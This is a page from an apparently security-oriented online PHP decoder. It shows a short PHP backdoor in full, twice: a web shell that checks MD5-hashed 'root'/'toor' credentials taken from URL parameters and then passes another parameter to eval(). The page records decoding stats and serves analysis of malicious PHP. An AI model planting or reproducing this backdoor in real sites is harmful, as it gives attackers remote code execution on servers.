Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $user="63a9f0ea7bb98050796b649e85481845"; #root $pass="7b24afc8bc80e548d66c4e7ff7217..
Decoded Output download
<?php
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>
Did this file decode correctly?
Original Code
<?php
$user="63a9f0ea7bb98050796b649e85481845"; #root
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
{eval($_GET['idc']);}
?>
Function Calls
| md5 | 2 |
Stats
| MD5 | 7c5b1b30196c51f1accbffb80296395f |
| Eval Count | 0 |
| Decode Time | 129 ms |